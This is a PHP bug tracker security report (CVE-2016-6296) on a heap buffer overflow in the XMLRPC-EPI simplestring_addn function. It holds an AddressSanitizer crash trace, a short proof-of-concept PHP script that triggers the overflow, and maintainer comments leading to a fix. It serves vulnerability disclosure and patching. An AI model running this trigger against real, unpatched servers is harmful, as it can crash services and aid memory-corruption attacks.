php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #72606 heap-buffer-overflow (write) simplestring_addn simplestring.c
Submitted: 2016-07-17 09:08 UTC Modified: 2016-07-25 15:21 UTC
From: pranjal dot jumde at gmail dot com Assigned: stas (profile)
Status: Closed Package: XMLRPC-EPI related
PHP Version: 5.5.37 OS: All
Private report: No CVE-ID: 2016-6296
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: pranjal dot jumde at gmail dot com
New email:
PHP Version: OS:

 

 [2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com 
Description:
------------
String length checks in simplestring_addn in simplestring.c use length as signed integers. This can be used by a malicious php script to cause out of bounds write on the heap.

Tested on: git source https://github.com/php/php-src.git. Commit version: 735bec4f4018a4009a37d96489afe941c1ad711a compiled with address sanitizer.

Repro steps: Run the attached php script with xmlrpc enabled version of php.

$php poc.php 
=================================================================
==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310

WRITE of size 2147483581 at 0x60c00000bac0 thread T0

    #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd)
    #1 0x10995aeb5 in simplestring_addn simplestring.c:212
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109962580 in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0)
allocated by thread T0 here:
    #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07)
    #1 0x10995ae30 in simplestring_addn simplestring.c:205
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109961b8d in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy
Shadow bytes around the buggy address:
  0x1c1800001700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c1800001740: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x1c1800001750: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x1c1800001760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 fa
  0x1c1800001770: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c1800001780: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x1c1800001790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c18000017a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==57127==ABORTING
Abort trap: 6



Test script:
---------------
<?php
ini_set('memory_limit', '2148M');
$max = 2147483582;

$name = '';
for ($i = 1; $i<$max; $i++) {
	$name .= 'a';
}

$request = xmlrpc_encode_request($name, "somevalue");
?>

Expected result:
----------------
No crash. Patch attached.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
 [2016-07-17 23:49 UTC] stas@php.net 
This code seems to be part of libxmlrpc, It would make sense to report it to them, the homepage seems to be here: http://xmlrpc-epi.sourceforge.net/

While PHP can mitigate the issue, ultimately the package maintainers should take care of it.
 [2016-07-18 00:04 UTC] stas@php.net 
Looking more into it, it's not easy to fix it outside of libxmlrpc, as everything is happening inside the library, and I'm not sure it's even maintained now.
 [2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com 
Thanks Stanislav, did you get a chance to review the patch I uploaded for this issue? It was a band aid fix but, I agree that the actual fix would be in xml-rpc library.

From: http://gggeek.github.io/phpxmlrpc/

I think ggiunta at users.sourceforge.net would be the right person to comment to comment. Could you add him to the CC list of this bug?
 [2016-07-18 00:46 UTC] stas@php.net 
I'm sorry, I don't see any patches attached. Could you send it to stas@php.net or upload to gist.github.com as secret gist?
 [2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com 
I mailed the patch to you let me know if you have any questions about it.
 [2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-07-19 04:45 UTC] stas@php.net 
Fix in security repo as e6c48213c22ed50b2b987b479fcc1ac709394caa and in https://gist.github.com/6eaf2bc74f9bc9db34cb4b10ed06b466
 [2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
 [2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com 
The patch looks good, thanks for the quick turn around. Could you provide any details on the tentative release timeline?
 [2016-07-19 07:47 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-07-19 07:53 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:39 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:55 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com 
Since, this report is public now. Could you please assign a CVE-ID to this bug.
 [2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
 [2016-10-17 10:11 UTC] bwoebi@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-10-20 03:44 UTC] nguyenluan dot vnn at gmail dot com 
Related To: Bug #73349
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sat Dec 21 13:01:31 2024 UTC